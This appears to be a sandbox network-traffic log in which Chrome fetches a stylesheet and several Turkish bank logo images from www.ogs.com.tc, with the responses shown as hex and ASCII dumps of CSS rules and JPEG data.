2024-05-25 22:17:13 UTC	284	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 22:17:13 GMT Content-Type: text/css Content-Length: 149508 Last-Modified: Thu, 23 May 2024 21:37:04 GMT Connection: close ETag: "664fb700-24804" Alt-Svc: h3=":443"; ma=86400 X-Powered-By: PleskLin Accept-Ranges: bytes
2024-05-25 22:17:13 UTC	16100	IN	Data Raw: 40 69 6d 70 6f 72 74 20 75 72 6c 28 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 69 74 61 6c 2c 77 67 68 74 40 30 2c 33 30 30 3b 30 2c 34 30 30 3b 30 2c 35 30 30 3b 30 2c 36 30 30 3b 30 2c 37 30 30 3b 30 2c 38 30 30 3b 31 2c 33 30 30 3b 31 2c 34 30 30 3b 31 2c 35 30 30 3b 31 2c 36 30 30 3b 31 2c 37 30 30 3b 31 2c 38 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 27 29 3b 0d 0a 40 69 6d 70 6f 72 74 20 75 72 6c 28 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 53 6c 61 62 3a 77 67 68 74 40 31 30 30 3b 32 30 30 3b 33 30 30 3b 34 30 30 3b 35 30 30 3b 36 Data Ascii: @import url('https://fonts.googleapis.com/css2?family=Open+Sans:ital,wght@0,300;0,400;0,500;0,600;0,700;0,800;1,300;1,400;1,500;1,600;1,700;1,800&display=swap');@import url('https://fonts.googleapis.com/css2?family=Roboto+Slab:wght@100;200;300;400;500;6
2024-05-25 22:17:13 UTC	16384	IN	Data Raw: 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 2e 33 33 65 6d 20 72 67 62 61 28 32 30 37 2c 20 33 34 2c 20 32 38 2c 20 2e 35 29 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 6e 6f 6e 65 0d 0a 7d 0d 0a 0d 0a 2e 73 65 72 76 69 63 65 46 6f 72 6d 20 2e 66 6f 72 6d 52 6f 77 3a 6c 61 73 74 2d 6f 66 2d 74 79 70 65 20 7b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 6e 6f 6e 65 0d 0a 7d 0d 0a 0d 0a 2e 73 65 72 76 69 63 65 46 6f 72 6d 20 2e 66 6f 72 6d 52 6f 77 20 2e 66 69 65 6c 64 43 6f 6e 66 69 72 6d 20 7b 0d 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 Data Ascii: box-shadow: 0 0 .33em rgba(207, 34, 28, .5); border-bottom: none}.serviceForm .formRow:last-of-type { border-bottom: none}.serviceForm .formRow .fieldConfirm { border: none; margin: 0; padding: 0; font-weight: 40
2024-05-25 22:17:13 UTC	16384	IN	Data Raw: 3a 20 2e 35 65 6d 0d 0a 7d 0d 0a 0d 0a 2e 73 65 72 76 69 63 65 46 6f 72 6d 2e 6f 6e 65 50 61 67 65 20 2e 66 6f 72 6d 52 6f 77 20 7b 0d 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 2e 35 65 6d 0d 0a 7d 0d 0a 0d 0a 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 37 36 38 70 78 29 20 7b 0d 0a 20 20 20 20 2e 73 65 72 76 69 63 65 46 6f 72 6d 2e 6f 6e 65 50 61 67 65 20 2e 66 6f 72 6d 52 6f 77 20 7b 0d 0a 20 20 20 20 20 20 20 20 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 0d 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 35 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 62 6f Data Ascii: : .5em}.serviceForm.onePage .formRow { -webkit-box-sizing: border-box; box-sizing: border-box; padding: .5em}@media (min-width: 768px) { .serviceForm.onePage .formRow { float: left; width: 50%; bo
2024-05-25 22:17:13 UTC	16384	IN	Data Raw: 74 3a 20 27 5c 65 38 30 64 27 0d 0a 7d 0d 0a 0d 0a 2e 69 63 6f 2d 63 61 6d 65 72 61 3a 62 65 66 6f 72 65 20 7b 0d 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 27 5c 65 38 30 65 27 0d 0a 7d 0d 0a 0d 0a 2e 69 63 6f 2d 74 68 2d 6c 61 72 67 65 3a 62 65 66 6f 72 65 20 7b 0d 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 27 5c 65 38 30 66 27 0d 0a 7d 0d 0a 0d 0a 2e 69 63 6f 2d 74 68 3a 62 65 66 6f 72 65 20 7b 0d 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 27 5c 65 38 31 30 27 0d 0a 7d 0d 0a 0d 0a 2e 69 63 6f 2d 74 68 2d 6c 69 73 74 3a 62 65 66 6f 72 65 20 7b 0d 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 27 5c 65 38 31 31 27 0d 0a 7d 0d 0a 0d 0a 2e 69 63 6f 2d 6f 6b 3a 62 65 66 6f 72 65 20 7b 0d 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 27 5c 65 38 31 32 27 0d 0a 7d 0d 0a Data Ascii: t: '\e80d'}.ico-camera:before { content: '\e80e'}.ico-th-large:before { content: '\e80f'}.ico-th:before { content: '\e810'}.ico-th-list:before { content: '\e811'}.ico-ok:before { content: '\e812'}
2024-05-25 22:17:13 UTC	16384	IN	Data Raw: 68 65 72 69 74 3b 0d 0a 20 20 20 20 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 6e 6f 6e 65 3b 0d 0a 20 20 20 20 74 65 78 74 2d 72 65 6e 64 65 72 69 6e 67 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 20 61 6e 74 69 61 6c 69 61 73 65 64 3b 0d 0a 20 20 20 20 2d 6d 6f 7a 2d 6f 73 78 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 20 67 72 61 79 73 63 61 6c 65 3b 0d 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 30 33 22 0d 0a 7d 0d 0a 0d 0a 2e 65 64 6b 2d 66 6f 6e 74 69 63 6f 6e 2d 61 70 70 73 74 6f 72 65 3a 62 65 66 6f 72 65 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 65 64 6b 3b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0d Data Ascii: herit; text-transform: none; text-rendering: auto; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; content: "\f103"}.edk-fonticon-appstore:before { font-family: edk; display: inline-block;
2024-05-25 22:17:14 UTC	16384	IN	Data Raw: 2d 71 75 65 73 74 69 6f 6e 32 33 3a 62 65 66 6f 72 65 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 65 64 6b 3b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 0d 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0d 0a 20 20 20 20 73 70 65 61 6b 3a 20 6e 6f 6e 65 3b 0d 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 69 6e 68 65 72 69 74 3b 0d 0a 20 20 20 20 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 6e 6f 6e 65 3b 0d 0a 20 20 20 20 74 65 78 74 Data Ascii: -question23:before { font-family: edk; display: inline-block; vertical-align: middle; line-height: 1; font-weight: 400; font-style: normal; speak: none; text-decoration: inherit; text-transform: none; text
2024-05-25 22:17:14 UTC	16384	IN	Data Raw: 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0d 0a 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0d 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 20 61 75 74 6f 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 0d 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 0d 0a 7d 0d 0a 0d 0a 23 62 61 73 69 73 20 2e 72 6f 75 6e 64 2d 74 69 6d 65 72 20 73 70 61 6e 20 7b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f Data Ascii: ction: column; flex-direction: column; -webkit-box-pack: center; -ms-flex-pack: center; justify-content: center; margin: 5px auto; border-radius: 50%; text-align: center}#basis .round-timer span { display: blo
2024-05-25 22:17:14 UTC	16384	IN	Data Raw: 34 37 61 61 31 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 74 6f 70 3a 20 2e 31 65 6d 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 2e 32 35 65 6d 0d 0a 7d 0d 0a 0d 0a 23 62 61 73 69 73 20 2e 66 6f 72 6d 52 6f 77 20 2e 66 69 65 6c 64 45 72 72 6f 72 20 7b 0d 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0d 0a 20 20 20 20 6c 69 73 74 2d 73 74 79 6c 65 3a 20 6e 6f 6e 65 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 2e 32 35 65 6d Data Ascii: 47aa1; font-weight: 400; position: relative; top: .1em; margin-right: .25em}#basis .formRow .fieldError { border: none; margin: 0; padding: 0; font-weight: 400; list-style: none; margin-bottom: .25em
2024-05-25 22:17:14 UTC	16384	IN	Data Raw: 3b 0d 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 69 6e 68 65 72 69 74 3b 0d 0a 20 20 20 20 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 6e 6f 6e 65 3b 0d 0a 20 20 20 20 74 65 78 74 2d 72 65 6e 64 65 72 69 6e 67 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 20 61 6e 74 69 61 6c 69 61 73 65 64 3b 0d 0a 20 20 20 20 2d 6d 6f 7a 2d 6f 73 78 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 20 67 72 61 79 73 63 61 6c 65 3b 0d 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 32 38 22 0d 0a 7d 0d 0a 0d 0a 23 62 61 73 69 73 20 2e 66 6f 72 6d 52 6f 77 20 2e 61 64 64 72 65 73 73 50 69 63 6b 65 72 4c 69 6e 6b 3a 62 65 66 6f 72 65 2c 0d 0a 23 62 61 73 69 73 20 2e 66 6f 72 6d 52 Data Ascii: ; text-decoration: inherit; text-transform: none; text-rendering: auto; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; content: "\f128"}#basis .formRow .addressPickerLink:before,#basis .formR
2024-05-25 22:17:14 UTC	2336	IN	Data Raw: 3b 0d 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 64 6f 74 74 65 64 20 23 63 38 64 61 65 33 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 35 70 78 20 31 30 70 78 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 Data Ascii: ; -webkit-box-align: center; -ms-flex-align: center; align-items: center; -webkit-box-pack: center; -ms-flex-pack: center; justify-content: center; border: 1px dotted #c8dae3; padding: 5px 10px; border-radius:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49740	185.216.70.93	443	4340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 22:17:14 UTC	603	OUT	GET /assets/images/banks/akbank.jpg HTTP/1.1 Host: www.ogs.com.tc Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://www.ogs.com.tc/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-25 22:17:14 UTC	282	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 22:17:14 GMT Content-Type: image/jpeg Content-Length: 3052 Last-Modified: Thu, 23 May 2024 21:37:06 GMT Connection: close ETag: "664fb702-bec" Alt-Svc: h3=":443"; ma=86400 X-Powered-By: PleskLin Accept-Ranges: bytes
2024-05-25 22:17:14 UTC	3052	IN	Data Raw: 52 49 46 46 e4 0b 00 00 57 45 42 50 56 50 38 20 d8 0b 00 00 90 47 00 9d 01 2a f4 01 c8 00 3e 49 24 8c 46 22 a2 21 21 24 71 f0 50 09 09 65 6e e1 76 b1 1b 10 1f dd ff 20 3b fa 28 07 4a fc 80 fc c6 f9 81 a6 ff 45 fb fb fb c9 fe cb e2 af 6a 7c ab e6 e3 c4 7f dc 3f 30 bf b1 7f ff ff ff f3 4f f9 cf e4 37 c9 7f b7 2f 70 0f d1 cf f1 9f db 7f 6a 7f c1 ff ff ff ff e0 63 cc 07 ed 1f ed 0f bc bf f7 3f f8 1f d5 7d cb 7a 00 7f 3a fe c7 ff c3 b0 3b d0 03 f6 cf ff ff b3 7f fa af fa 5f ef 3f 7f fe 8f 3f ae 7f 96 ff c5 fe d3 da 0b fe 8f 58 07 09 8f f7 2f c6 cf 09 bf c2 63 ba 81 07 dd 1f d0 fe 42 72 03 af ae f4 a5 d2 f8 50 7f 2d e9 26 94 d9 a2 ff de f3 73 f5 70 4b af 2e 08 5e a5 09 28 89 e7 17 97 04 2f 52 84 94 44 f3 8b cb 82 17 a9 42 4a 22 79 c5 e5 c1 0b d4 a1 25 11 3c e2 Data Ascii: RIFFWEBPVP8 G*>I$F"!!$qPenv ;(JEj\|?0O7/pjc?}z:;_??X/cBrP-&spK.^(/RDBJ"y%<

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49743	185.216.70.93	443	4340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 22:17:14 UTC	605	OUT	GET /assets/images/banks/albaraka.jpg HTTP/1.1 Host: www.ogs.com.tc Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://www.ogs.com.tc/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-25 22:17:14 UTC	284	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 22:17:14 GMT Content-Type: image/jpeg Content-Length: 36270 Last-Modified: Thu, 23 May 2024 21:37:07 GMT Connection: close ETag: "664fb703-8dae" Alt-Svc: h3=":443"; ma=86400 X-Powered-By: PleskLin Accept-Ranges: bytes
2024-05-25 22:17:14 UTC	16100	IN	Data Raw: ff d8 ff e1 0b d3 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 91 87 69 00 04 00 00 00 01 00 00 00 a8 00 00 00 d4 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 33 2e 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 31 30 3a 30 31 20 32 30 3a 31 39 3a 32 37 00 00 00 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 01 f4 a0 03 00 04 00 00 00 01 00 00 00 c8 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 22 01 1b 00 05 00 Data Ascii: ExifMM*bj(1r2i''Adobe Photoshop 23.5 (Windows)2022:10:01 20:19:27"
2024-05-25 22:17:14 UTC	16384	IN	Data Raw: 8d 65 3a d4 b4 37 68 39 09 34 8b bd 73 b1 6a bb b3 0b 8c ad 9e 3c d2 42 f5 67 6b 6e 91 37 9b b5 6d fe f1 ef a5 1f a4 df 90 c7 d1 97 cc 00 a4 83 76 c1 0c 53 14 c5 29 80 9d f0 24 28 88 14 a1 06 30 10 26 4c 13 8c 83 04 08 01 80 24 cb e6 02 58 9d fb 72 3c 4d d9 12 8d d4 53 10 a6 10 95 2c b0 02 03 15 11 23 b6 77 ed c4 93 c0 80 08 10 7e 99 c4 39 80 c9 20 c0 04 b2 88 f8 7b 09 95 2d f1 1a a1 c6 fc 94 47 e4 42 5b 8c c9 b2 a4 ca ce cc b0 b5 39 66 f8 02 cc 31 20 67 1c 63 98 f3 fa 87 e3 f5 0f 00 22 03 f5 66 47 d5 99 1f 56 67 b0 13 8e 00 69 a7 30 01 84 a2 33 0e 20 53 18 b0 33 0e 21 00 22 02 13 e6 04 18 e6 34 14 e6 2c 18 c6 34 14 e6 2c 09 cc 60 80 11 01 fa b3 20 c6 31 a0 b3 0e 58 19 d3 06 39 8f 3f ab 33 da 4e 29 14 09 0b d3 4b b3 2a da 3a 6a 1c fb c5 da c9 2b 3d 90 31 Data Ascii: e:7h94sj<Bgkn7mvS)$(0&L$Xr<MS,#w~9 {-GB[9f1 gc"fGVgi03 S3!"4,4,` 1X9?3N)K*:j+=1
2024-05-25 22:17:14 UTC	3786	IN	Data Raw: 48 ec 12 90 4d 73 8a cb 9f 61 f8 3a 68 d9 ea 80 c1 76 9b 25 bd b6 00 66 e9 19 ce 30 a3 39 f5 bc b3 a8 b0 8d 18 47 b1 b7 b2 98 df 94 b2 40 b4 5d 68 8c 4a e8 a8 08 cd 08 c7 b0 e3 3e 40 a4 95 9c db e0 b4 76 f9 3d 55 1c ce d5 3d 65 ed 14 e3 57 d8 c5 52 0d 5c 19 02 64 80 3b d3 30 dc e1 18 6a d7 8d ce 63 9a e5 b3 f6 17 c9 d7 4a e9 70 07 77 b5 f6 f1 3e c2 42 2b 8f 5e df 56 df 77 c6 11 dc 47 a3 9e 48 0e 53 df d6 8d ad 7b 94 2e b3 47 3d ac 0c 71 f8 f6 a1 95 29 a4 a6 66 0e 03 91 b4 10 a3 fa 8e 48 84 bd b5 d1 50 57 59 99 42 9d 1a f9 21 af a6 88 d4 73 ba ab 5a 45 46 f4 ee 77 5f 6a d9 2e 62 8b 4f 61 83 b8 e4 d8 e2 99 53 a0 00 e5 d2 de 68 23 53 5b cd c3 50 59 42 3a 3a 35 84 5b ed d4 6a d8 6e 8a 66 bc 32 bd 7f 48 8c 7b 1e e6 a8 c2 11 b0 41 13 18 21 08 4c 68 c6 21 8d a8 Data Ascii: HMsa:hv%f09G@]hJ>@v=U=eWR\d;0jcJpw>B+^VwGHS{.G=q)fHPWYB!sZEFw_j.bOaSh#S[PYB::5[jnf2H{A!Lh!

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49741	185.216.70.93	443	4340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 22:17:14 UTC	607	OUT	GET /assets/images/banks/alternatif.jpg HTTP/1.1 Host: www.ogs.com.tc Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://www.ogs.com.tc/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-25 22:17:14 UTC	284	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 22:17:14 GMT Content-Type: image/jpeg Content-Length: 46102 Last-Modified: Thu, 23 May 2024 21:37:08 GMT Connection: close ETag: "664fb704-b416" Alt-Svc: h3=":443"; ma=86400 X-Powered-By: PleskLin Accept-Ranges: bytes
2024-05-25 22:17:14 UTC	16100	IN	Data Raw: ff d8 ff e1 0b f3 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 91 87 69 00 04 00 00 00 01 00 00 00 a8 00 00 00 d4 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 33 2e 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 31 30 3a 30 31 20 31 37 3a 31 39 3a 31 30 00 00 00 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 01 f4 a0 03 00 04 00 00 00 01 00 00 00 c8 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 22 01 1b 00 05 00 Data Ascii: ExifMM*bj(1r2i''Adobe Photoshop 23.5 (Windows)2022:10:01 17:19:10"
2024-05-25 22:17:14 UTC	16384	IN	Data Raw: d2 2b 42 e1 d1 22 73 68 a6 4a d7 1d b0 e3 9e 68 7f 4e 9f 8a b2 30 89 7c 49 98 c6 31 8b 87 22 29 5d bf f5 4a ac c8 cb 52 32 b9 cf 80 98 65 46 7c 7f af 48 13 33 28 2f e8 e4 41 10 05 58 be 8a d9 97 4e dd 97 38 40 2f 5d fc 81 1c 59 39 a9 ff 00 19 bb 92 6e 5c 73 dc a3 ee 4a d2 69 b7 e5 db fd ee f2 31 da bc f7 2c e5 6d 84 ad 9b 89 b3 d8 a4 d4 6b 9d b6 ea 47 d9 ed 60 87 d6 fe 44 b0 ce e7 1a 66 8b 60 8b 77 28 e1 c5 ad 5a 9f 6b af 6c c7 28 5c 56 9d f8 ef 42 c2 68 6d 6d 04 c9 b1 da 44 6e 5d a3 c6 37 b0 ef 2d eb 0a 7c 83 dd fb c7 d4 6f 62 a7 39 0e 38 7b c1 8f 97 04 85 61 26 ef a4 b5 96 5c 7a 98 ea 90 f7 5b 06 eb 19 dd 61 e4 c7 be 83 9a 1f d3 a7 a1 8b 1e ba a4 6d c3 2a 9d b3 35 44 bb 58 b5 9e 39 d7 be 9c 15 df 66 65 26 44 9b 28 ff 00 a7 24 5d 8e 85 5c cb 1d b9 6a 6a Data Ascii: +B"shJhN0\|I1")]JR2eF\|H3(/AXN8@/]Y9n\sJi1,mkG`Df`w(Zkl(\VBhmmDn]7-\|ob98{a&\z[am*5DX9fe&D($]\jj
2024-05-25 22:17:14 UTC	13618	IN	Data Raw: 31 1f 27 1a 05 4e e0 2f b3 c2 cf d8 8b c9 5f e5 8e 6f fb 35 22 54 11 14 55 22 55 44 44 44 4e aa aa ab ec 88 89 eb 67 e2 7f 87 5b 4b 1c 8f 00 e5 a7 59 64 f9 2b 96 72 f3 5c 81 a2 e6 bb fa d9 87 0e e6 a3 27 79 0c c6 55 4f 15 d7 4b 8a 6c 24 a8 ae 03 ba 05 43 24 3f a1 50 47 f1 1c 35 c3 d9 0b 1d b7 24 f2 25 f4 6c e6 3b 27 4e 2d a4 ab 4b 49 48 4e 38 e3 d2 1e 26 e2 d7 56 57 44 6d c9 53 e7 48 30 8d 0a 23 2e 3e f1 8b 60 45 ea 93 90 3c 88 a6 cc 79 23 e4 8c 88 71 e5 58 d9 68 ea c2 df 8a f8 ee 79 a9 b8 ed 67 1b e4 ee 63 23 13 9c 8a 24 0d 1d c5 a3 0e 4d 90 4d ab 8c b7 0c 0c 99 f4 cc 38 51 a3 c3 89 1c 11 b6 22 c5 65 b8 f1 d8 6d 3e e0 65 86 44 1a 6c 13 af dc 28 89 fb 8e f7 8c 73 d6 83 0b 90 7c a8 ba 4e 20 a8 06 9e ec 9b 1f 0b f4 e9 6b ca 36 cd 00 aa 3a 51 bf 57 00 2a dc Data Ascii: 1'N/_o5"TU"UDDDNg[KYd+r\'yUOKl$C$?PG5$%l;'N-KIHN8&VWDmSH0#.>`E<y#qXhygc#$MM8Q"em>eDl(s\|N k6:QW*

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49742	185.216.70.93	443	4340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 22:17:14 UTC	604	OUT	GET /assets/images/banks/anadolu.jpg HTTP/1.1 Host: www.ogs.com.tc Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://www.ogs.com.tc/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
